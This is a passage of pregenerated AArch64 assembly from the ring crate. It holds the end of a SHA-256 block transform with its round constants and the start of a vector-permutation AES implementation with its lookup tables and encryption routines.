add w25,w25,w16 // h+=Sigma1(e)
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w5,w26,ror#22 // Sigma0(a)
eor w3,w3,w12,lsr#10 // sigma1(X[i+14])
add w14,w14,w7
add w21,w21,w25 // d+=h
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w14,w14,w4
add w25,w25,w17 // h+=Sigma0(a)
add w14,w14,w3
ldr w3,[sp,#0]
str w6,[sp,#12]
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
ror w5,w0,#7
and w17,w22,w21
ror w4,w13,#17
bic w28,w23,w21
ror w6,w25,#2
add w24,w24,w14 // h+=X[i]
eor w16,w16,w21,ror#11
eor w5,w5,w0,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w21,ror#25 // Sigma1(e)
eor w6,w6,w25,ror#13
add w24,w24,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w4,w4,w13,ror#19
eor w5,w5,w0,lsr#3 // sigma0(X[i+1])
add w24,w24,w16 // h+=Sigma1(e)
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w6,w25,ror#22 // Sigma0(a)
eor w4,w4,w13,lsr#10 // sigma1(X[i+14])
add w15,w15,w8
add w20,w20,w24 // d+=h
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w15,w15,w5
add w24,w24,w17 // h+=Sigma0(a)
add w15,w15,w4
ldr w4,[sp,#4]
str w7,[sp,#0]
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
ror w6,w1,#7
and w17,w21,w20
ror w5,w14,#17
bic w19,w22,w20
ror w7,w24,#2
add w23,w23,w15 // h+=X[i]
eor w16,w16,w20,ror#11
eor w6,w6,w1,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w20,ror#25 // Sigma1(e)
eor w7,w7,w24,ror#13
add w23,w23,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w5,w5,w14,ror#19
eor w6,w6,w1,lsr#3 // sigma0(X[i+1])
add w23,w23,w16 // h+=Sigma1(e)
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w7,w24,ror#22 // Sigma0(a)
eor w5,w5,w14,lsr#10 // sigma1(X[i+14])
add w0,w0,w9
add w27,w27,w23 // d+=h
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w0,w0,w6
add w23,w23,w17 // h+=Sigma0(a)
add w0,w0,w5
ldr w5,[sp,#8]
str w8,[sp,#4]
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
ror w7,w2,#7
and w17,w20,w27
ror w6,w15,#17
bic w28,w21,w27
ror w8,w23,#2
add w22,w22,w0 // h+=X[i]
eor w16,w16,w27,ror#11
eor w7,w7,w2,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w27,ror#25 // Sigma1(e)
eor w8,w8,w23,ror#13
add w22,w22,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w6,w6,w15,ror#19
eor w7,w7,w2,lsr#3 // sigma0(X[i+1])
add w22,w22,w16 // h+=Sigma1(e)
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w8,w23,ror#22 // Sigma0(a)
eor w6,w6,w15,lsr#10 // sigma1(X[i+14])
add w1,w1,w10
add w26,w26,w22 // d+=h
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w1,w1,w7
add w22,w22,w17 // h+=Sigma0(a)
add w1,w1,w6
ldr w6,[sp,#12]
str w9,[sp,#8]
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
ror w8,w3,#7
and w17,w27,w26
ror w7,w0,#17
bic w19,w20,w26
ror w9,w22,#2
add w21,w21,w1 // h+=X[i]
eor w16,w16,w26,ror#11
eor w8,w8,w3,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w26,ror#25 // Sigma1(e)
eor w9,w9,w22,ror#13
add w21,w21,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w7,w7,w0,ror#19
eor w8,w8,w3,lsr#3 // sigma0(X[i+1])
add w21,w21,w16 // h+=Sigma1(e)
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w9,w22,ror#22 // Sigma0(a)
eor w7,w7,w0,lsr#10 // sigma1(X[i+14])
add w2,w2,w11
add w25,w25,w21 // d+=h
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w2,w2,w8
add w21,w21,w17 // h+=Sigma0(a)
add w2,w2,w7
ldr w7,[sp,#0]
str w10,[sp,#12]
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
ror w9,w4,#7
and w17,w26,w25
ror w8,w1,#17
bic w28,w27,w25
ror w10,w21,#2
add w20,w20,w2 // h+=X[i]
eor w16,w16,w25,ror#11
eor w9,w9,w4,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w25,ror#25 // Sigma1(e)
eor w10,w10,w21,ror#13
add w20,w20,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w8,w8,w1,ror#19
eor w9,w9,w4,lsr#3 // sigma0(X[i+1])
add w20,w20,w16 // h+=Sigma1(e)
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w10,w21,ror#22 // Sigma0(a)
eor w8,w8,w1,lsr#10 // sigma1(X[i+14])
add w3,w3,w12
add w24,w24,w20 // d+=h
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w3,w3,w9
add w20,w20,w17 // h+=Sigma0(a)
add w3,w3,w8
cbnz w19,.Loop_16_xx
ldp x0,x2,[x29,#96]
ldr x1,[x29,#112]
sub x30,x30,#260 // rewind
ldp w3,w4,[x0]
ldp w5,w6,[x0,#2*4]
add x1,x1,#14*4 // advance input pointer
ldp w7,w8,[x0,#4*4]
add w20,w20,w3
ldp w9,w10,[x0,#6*4]
add w21,w21,w4
add w22,w22,w5
add w23,w23,w6
stp w20,w21,[x0]
add w24,w24,w7
add w25,w25,w8
stp w22,w23,[x0,#2*4]
add w26,w26,w9
add w27,w27,w10
cmp x1,x2
stp w24,w25,[x0,#4*4]
stp w26,w27,[x0,#6*4]
b.ne .Loop
ldp x19,x20,[x29,#16]
add sp,sp,#4*4
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldp x29,x30,[sp],#128
AARCH64_VALIDATE_LINK_REGISTER
ret
.size sha256_block_data_order_nohw,.-sha256_block_data_order_nohw
.section .rodata
.align 6
.type .LK256,%object
.LK256:
.long 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.long 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.long 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.long 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.long 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.long 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.long 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.long 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.long 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.long 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.long 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.long 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.long 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.long 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.long 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.long 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.long 0 //terminator
.size .LK256,.-.LK256
.byte 83,72,65,50,53,54,32,98,108,111,99,107,32,116,114,97,110,115,102,111,114,109,32,102,111,114,32,65,82,77,118,56,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 2
.align 2
.text
#ifndef __KERNEL__
.globl sha256_block_data_order_hw
.hidden sha256_block_data_order_hw
.type sha256_block_data_order_hw,%function
.align 6
sha256_block_data_order_hw:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ld1 {v0.4s,v1.4s},[x0]
adrp x3,.LK256
add x3,x3,:lo12:.LK256
.Loop_hw:
ld1 {v4.16b,v5.16b,v6.16b,v7.16b},[x1],#64
sub x2,x2,#1
ld1 {v16.4s},[x3],#16
rev32 v4.16b,v4.16b
rev32 v5.16b,v5.16b
rev32 v6.16b,v6.16b
rev32 v7.16b,v7.16b
orr v18.16b,v0.16b,v0.16b // offload
orr v19.16b,v1.16b,v1.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
.inst 0x5e2828a4 //sha256su0 v4.16b,v5.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e0760c4 //sha256su1 v4.16b,v6.16b,v7.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
.inst 0x5e2828c5 //sha256su0 v5.16b,v6.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0460e5 //sha256su1 v5.16b,v7.16b,v4.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v6.4s
.inst 0x5e2828e6 //sha256su0 v6.16b,v7.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e056086 //sha256su1 v6.16b,v4.16b,v5.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v7.4s
.inst 0x5e282887 //sha256su0 v7.16b,v4.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0660a7 //sha256su1 v7.16b,v5.16b,v6.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
.inst 0x5e2828a4 //sha256su0 v4.16b,v5.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e0760c4 //sha256su1 v4.16b,v6.16b,v7.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
.inst 0x5e2828c5 //sha256su0 v5.16b,v6.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0460e5 //sha256su1 v5.16b,v7.16b,v4.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v6.4s
.inst 0x5e2828e6 //sha256su0 v6.16b,v7.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e056086 //sha256su1 v6.16b,v4.16b,v5.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v7.4s
.inst 0x5e282887 //sha256su0 v7.16b,v4.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0660a7 //sha256su1 v7.16b,v5.16b,v6.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
.inst 0x5e2828a4 //sha256su0 v4.16b,v5.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e0760c4 //sha256su1 v4.16b,v6.16b,v7.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
.inst 0x5e2828c5 //sha256su0 v5.16b,v6.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0460e5 //sha256su1 v5.16b,v7.16b,v4.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v6.4s
.inst 0x5e2828e6 //sha256su0 v6.16b,v7.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e056086 //sha256su1 v6.16b,v4.16b,v5.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v7.4s
.inst 0x5e282887 //sha256su0 v7.16b,v4.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0660a7 //sha256su1 v7.16b,v5.16b,v6.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
ld1 {v17.4s},[x3]
add v16.4s,v16.4s,v6.4s
sub x3,x3,#64*4-16 // rewind
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
add v17.4s,v17.4s,v7.4s
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
add v0.4s,v0.4s,v18.4s
add v1.4s,v1.4s,v19.4s
cbnz x2,.Loop_hw
st1 {v0.4s,v1.4s},[x0]
ldr x29,[sp],#16
ret
.size sha256_block_data_order_hw,.-sha256_block_data_order_hw
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__ELF__)
|
mi2bjss/Pressel-site | 26,206 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/vpaes-armv8-linux64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__ELF__)
.section .rodata
.type _vpaes_consts,%object
.align 7 // totally strategic alignment
_vpaes_consts:
.Lk_mc_forward: // mc_forward
.quad 0x0407060500030201, 0x0C0F0E0D080B0A09
.quad 0x080B0A0904070605, 0x000302010C0F0E0D
.quad 0x0C0F0E0D080B0A09, 0x0407060500030201
.quad 0x000302010C0F0E0D, 0x080B0A0904070605
.Lk_mc_backward: // mc_backward
.quad 0x0605040702010003, 0x0E0D0C0F0A09080B
.quad 0x020100030E0D0C0F, 0x0A09080B06050407
.quad 0x0E0D0C0F0A09080B, 0x0605040702010003
.quad 0x0A09080B06050407, 0x020100030E0D0C0F
.Lk_sr: // sr
.quad 0x0706050403020100, 0x0F0E0D0C0B0A0908
.quad 0x030E09040F0A0500, 0x0B06010C07020D08
.quad 0x0F060D040B020900, 0x070E050C030A0108
.quad 0x0B0E0104070A0D00, 0x0306090C0F020508
//
// "Hot" constants
//
.Lk_inv: // inv, inva
.quad 0x0E05060F0D080180, 0x040703090A0B0C02
.quad 0x01040A060F0B0780, 0x030D0E0C02050809
.Lk_ipt: // input transform (lo, hi)
.quad 0xC2B2E8985A2A7000, 0xCABAE09052227808
.quad 0x4C01307D317C4D00, 0xCD80B1FCB0FDCC81
.Lk_sbo: // sbou, sbot
.quad 0xD0D26D176FBDC700, 0x15AABF7AC502A878
.quad 0xCFE474A55FBB6A00, 0x8E1E90D1412B35FA
.Lk_sb1: // sb1u, sb1t
.quad 0x3618D415FAE22300, 0x3BF7CCC10D2ED9EF
.quad 0xB19BE18FCB503E00, 0xA5DF7A6E142AF544
.Lk_sb2: // sb2u, sb2t
.quad 0x69EB88400AE12900, 0xC2A163C8AB82234A
.quad 0xE27A93C60B712400, 0x5EB7E955BC982FCD
//
// Key schedule constants
//
.Lk_dksd: // decryption key schedule: invskew x*D
.quad 0xFEB91A5DA3E44700, 0x0740E3A45A1DBEF9
.quad 0x41C277F4B5368300, 0x5FDC69EAAB289D1E
.Lk_dksb: // decryption key schedule: invskew x*B
.quad 0x9A4FCA1F8550D500, 0x03D653861CC94C99
.quad 0x115BEDA7B6FC4A00, 0xD993256F7E3482C8
.Lk_dkse: // decryption key schedule: invskew x*E + 0x63
.quad 0xD5031CCA1FC9D600, 0x53859A4C994F5086
.quad 0xA23196054FDC7BE8, 0xCD5EF96A20B31487
.Lk_dks9: // decryption key schedule: invskew x*9
.quad 0xB6116FC87ED9A700, 0x4AED933482255BFC
.quad 0x4576516227143300, 0x8BB89FACE9DAFDCE
.Lk_rcon: // rcon
.quad 0x1F8391B9AF9DEEB6, 0x702A98084D7C7D81
.Lk_opt: // output transform
.quad 0xFF9F4929D6B66000, 0xF7974121DEBE6808
.quad 0x01EDBD5150BCEC00, 0xE10D5DB1B05C0CE0
.Lk_deskew: // deskew tables: inverts the sbox's "skew"
.quad 0x07E4A34047A4E300, 0x1DFEB95A5DBEF91A
.quad 0x5F36B5DC83EA6900, 0x2841C2ABF49D1E77
.byte 86,101,99,116,111,114,32,80,101,114,109,117,116,97,116,105,111,110,32,65,69,83,32,102,111,114,32,65,82,77,118,56,44,32,77,105,107,101,32,72,97,109,98,117,114,103,32,40,83,116,97,110,102,111,114,100,32,85,110,105,118,101,114,115,105,116,121,41,0
.align 2
.size _vpaes_consts,.-_vpaes_consts
.align 6
.text
##
## _aes_preheat
##
## Fills register %r10 -> .aes_consts (so you can -fPIC)
## and %xmm9-%xmm15 as specified below.
##
.type _vpaes_encrypt_preheat,%function
.align 4
_vpaes_encrypt_preheat:
adrp x10, .Lk_inv
add x10, x10, :lo12:.Lk_inv
movi v17.16b, #0x0f
ld1 {v18.2d,v19.2d}, [x10],#32 // .Lk_inv
ld1 {v20.2d,v21.2d,v22.2d,v23.2d}, [x10],#64 // .Lk_ipt, .Lk_sbo
ld1 {v24.2d,v25.2d,v26.2d,v27.2d}, [x10] // .Lk_sb1, .Lk_sb2
ret
.size _vpaes_encrypt_preheat,.-_vpaes_encrypt_preheat
##
## _aes_encrypt_core
##
## AES-encrypt %xmm0.
##
## Inputs:
## %xmm0 = input
## %xmm9-%xmm15 as in _vpaes_preheat
## (%rdx) = scheduled keys
##
## Output in %xmm0
## Clobbers %xmm1-%xmm5, %r9, %r10, %r11, %rax
## Preserves %xmm6 - %xmm8 so you get some local vectors
##
##
.type _vpaes_encrypt_core,%function
.align 4
_vpaes_encrypt_core:
mov x9, x2
ldr w8, [x2,#240] // pull rounds
adrp x11, .Lk_mc_forward+16
add x11, x11, :lo12:.Lk_mc_forward+16
// vmovdqa .Lk_ipt(%rip), %xmm2 # iptlo
ld1 {v16.2d}, [x9], #16 // vmovdqu (%r9), %xmm5 # round0 key
and v1.16b, v7.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1
ushr v0.16b, v7.16b, #4 // vpsrlb $4, %xmm0, %xmm0
tbl v1.16b, {v20.16b}, v1.16b // vpshufb %xmm1, %xmm2, %xmm1
// vmovdqa .Lk_ipt+16(%rip), %xmm3 # ipthi
tbl v2.16b, {v21.16b}, v0.16b // vpshufb %xmm0, %xmm3, %xmm2
eor v0.16b, v1.16b, v16.16b // vpxor %xmm5, %xmm1, %xmm0
eor v0.16b, v0.16b, v2.16b // vpxor %xmm2, %xmm0, %xmm0
b .Lenc_entry
.align 4
.Lenc_loop:
// middle of middle round
add x10, x11, #0x40
tbl v4.16b, {v25.16b}, v2.16b // vpshufb %xmm2, %xmm13, %xmm4 # 4 = sb1u
ld1 {v1.2d}, [x11], #16 // vmovdqa -0x40(%r11,%r10), %xmm1 # .Lk_mc_forward[]
tbl v0.16b, {v24.16b}, v3.16b // vpshufb %xmm3, %xmm12, %xmm0 # 0 = sb1t
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
tbl v5.16b, {v27.16b}, v2.16b // vpshufb %xmm2, %xmm15, %xmm5 # 4 = sb2u
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
tbl v2.16b, {v26.16b}, v3.16b // vpshufb %xmm3, %xmm14, %xmm2 # 2 = sb2t
ld1 {v4.2d}, [x10] // vmovdqa (%r11,%r10), %xmm4 # .Lk_mc_backward[]
tbl v3.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm3 # 0 = B
eor v2.16b, v2.16b, v5.16b // vpxor %xmm5, %xmm2, %xmm2 # 2 = 2A
tbl v0.16b, {v0.16b}, v4.16b // vpshufb %xmm4, %xmm0, %xmm0 # 3 = D
eor v3.16b, v3.16b, v2.16b // vpxor %xmm2, %xmm3, %xmm3 # 0 = 2A+B
tbl v4.16b, {v3.16b}, v1.16b // vpshufb %xmm1, %xmm3, %xmm4 # 0 = 2B+C
eor v0.16b, v0.16b, v3.16b // vpxor %xmm3, %xmm0, %xmm0 # 3 = 2A+B+D
and x11, x11, #~(1<<6) // and $0x30, %r11 # ... mod 4
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = 2A+3B+C+D
sub w8, w8, #1 // nr--
.Lenc_entry:
// top of round
and v1.16b, v0.16b, v17.16b // vpand %xmm0, %xmm9, %xmm1 # 0 = k
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0 # 1 = i
tbl v5.16b, {v19.16b}, v1.16b // vpshufb %xmm1, %xmm11, %xmm5 # 2 = a/k
eor v1.16b, v1.16b, v0.16b // vpxor %xmm0, %xmm1, %xmm1 # 0 = j
tbl v3.16b, {v18.16b}, v0.16b // vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
tbl v4.16b, {v18.16b}, v1.16b // vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
eor v3.16b, v3.16b, v5.16b // vpxor %xmm5, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
eor v4.16b, v4.16b, v5.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
tbl v2.16b, {v18.16b}, v3.16b // vpshufb %xmm3, %xmm10, %xmm2 # 2 = 1/iak
tbl v3.16b, {v18.16b}, v4.16b // vpshufb %xmm4, %xmm10, %xmm3 # 3 = 1/jak
eor v2.16b, v2.16b, v1.16b // vpxor %xmm1, %xmm2, %xmm2 # 2 = io
eor v3.16b, v3.16b, v0.16b // vpxor %xmm0, %xmm3, %xmm3 # 3 = jo
ld1 {v16.2d}, [x9],#16 // vmovdqu (%r9), %xmm5
cbnz w8, .Lenc_loop
// middle of last round
add x10, x11, #0x80
// vmovdqa -0x60(%r10), %xmm4 # 3 : sbou .Lk_sbo
// vmovdqa -0x50(%r10), %xmm0 # 0 : sbot .Lk_sbo+16
tbl v4.16b, {v22.16b}, v2.16b // vpshufb %xmm2, %xmm4, %xmm4 # 4 = sbou
ld1 {v1.2d}, [x10] // vmovdqa 0x40(%r11,%r10), %xmm1 # .Lk_sr[]
tbl v0.16b, {v23.16b}, v3.16b // vpshufb %xmm3, %xmm0, %xmm0 # 0 = sb1t
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
tbl v0.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm0
ret
.size _vpaes_encrypt_core,.-_vpaes_encrypt_core
.type _vpaes_encrypt_2x,%function
.align 4
_vpaes_encrypt_2x:
mov x9, x2
ldr w8, [x2,#240] // pull rounds
adrp x11, .Lk_mc_forward+16
add x11, x11, :lo12:.Lk_mc_forward+16
// vmovdqa .Lk_ipt(%rip), %xmm2 # iptlo
ld1 {v16.2d}, [x9], #16 // vmovdqu (%r9), %xmm5 # round0 key
and v1.16b, v14.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1
ushr v0.16b, v14.16b, #4 // vpsrlb $4, %xmm0, %xmm0
and v9.16b, v15.16b, v17.16b
ushr v8.16b, v15.16b, #4
tbl v1.16b, {v20.16b}, v1.16b // vpshufb %xmm1, %xmm2, %xmm1
tbl v9.16b, {v20.16b}, v9.16b
// vmovdqa .Lk_ipt+16(%rip), %xmm3 # ipthi
tbl v2.16b, {v21.16b}, v0.16b // vpshufb %xmm0, %xmm3, %xmm2
tbl v10.16b, {v21.16b}, v8.16b
eor v0.16b, v1.16b, v16.16b // vpxor %xmm5, %xmm1, %xmm0
eor v8.16b, v9.16b, v16.16b
eor v0.16b, v0.16b, v2.16b // vpxor %xmm2, %xmm0, %xmm0
eor v8.16b, v8.16b, v10.16b
b .Lenc_2x_entry
.align 4
.Lenc_2x_loop:
// middle of middle round
add x10, x11, #0x40
tbl v4.16b, {v25.16b}, v2.16b // vpshufb %xmm2, %xmm13, %xmm4 # 4 = sb1u
tbl v12.16b, {v25.16b}, v10.16b
ld1 {v1.2d}, [x11], #16 // vmovdqa -0x40(%r11,%r10), %xmm1 # .Lk_mc_forward[]
tbl v0.16b, {v24.16b}, v3.16b // vpshufb %xmm3, %xmm12, %xmm0 # 0 = sb1t
tbl v8.16b, {v24.16b}, v11.16b
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
eor v12.16b, v12.16b, v16.16b
tbl v5.16b, {v27.16b}, v2.16b // vpshufb %xmm2, %xmm15, %xmm5 # 4 = sb2u
tbl v13.16b, {v27.16b}, v10.16b
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
eor v8.16b, v8.16b, v12.16b
tbl v2.16b, {v26.16b}, v3.16b // vpshufb %xmm3, %xmm14, %xmm2 # 2 = sb2t
tbl v10.16b, {v26.16b}, v11.16b
ld1 {v4.2d}, [x10] // vmovdqa (%r11,%r10), %xmm4 # .Lk_mc_backward[]
tbl v3.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm3 # 0 = B
tbl v11.16b, {v8.16b}, v1.16b
eor v2.16b, v2.16b, v5.16b // vpxor %xmm5, %xmm2, %xmm2 # 2 = 2A
eor v10.16b, v10.16b, v13.16b
tbl v0.16b, {v0.16b}, v4.16b // vpshufb %xmm4, %xmm0, %xmm0 # 3 = D
tbl v8.16b, {v8.16b}, v4.16b
eor v3.16b, v3.16b, v2.16b // vpxor %xmm2, %xmm3, %xmm3 # 0 = 2A+B
eor v11.16b, v11.16b, v10.16b
tbl v4.16b, {v3.16b}, v1.16b // vpshufb %xmm1, %xmm3, %xmm4 # 0 = 2B+C
tbl v12.16b, {v11.16b},v1.16b
eor v0.16b, v0.16b, v3.16b // vpxor %xmm3, %xmm0, %xmm0 # 3 = 2A+B+D
eor v8.16b, v8.16b, v11.16b
and x11, x11, #~(1<<6) // and $0x30, %r11 # ... mod 4
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = 2A+3B+C+D
eor v8.16b, v8.16b, v12.16b
sub w8, w8, #1 // nr--
.Lenc_2x_entry:
// top of round
and v1.16b, v0.16b, v17.16b // vpand %xmm0, %xmm9, %xmm1 # 0 = k
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0 # 1 = i
and v9.16b, v8.16b, v17.16b
ushr v8.16b, v8.16b, #4
tbl v5.16b, {v19.16b},v1.16b // vpshufb %xmm1, %xmm11, %xmm5 # 2 = a/k
tbl v13.16b, {v19.16b},v9.16b
eor v1.16b, v1.16b, v0.16b // vpxor %xmm0, %xmm1, %xmm1 # 0 = j
eor v9.16b, v9.16b, v8.16b
tbl v3.16b, {v18.16b},v0.16b // vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
tbl v11.16b, {v18.16b},v8.16b
tbl v4.16b, {v18.16b},v1.16b // vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
tbl v12.16b, {v18.16b},v9.16b
eor v3.16b, v3.16b, v5.16b // vpxor %xmm5, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
eor v11.16b, v11.16b, v13.16b
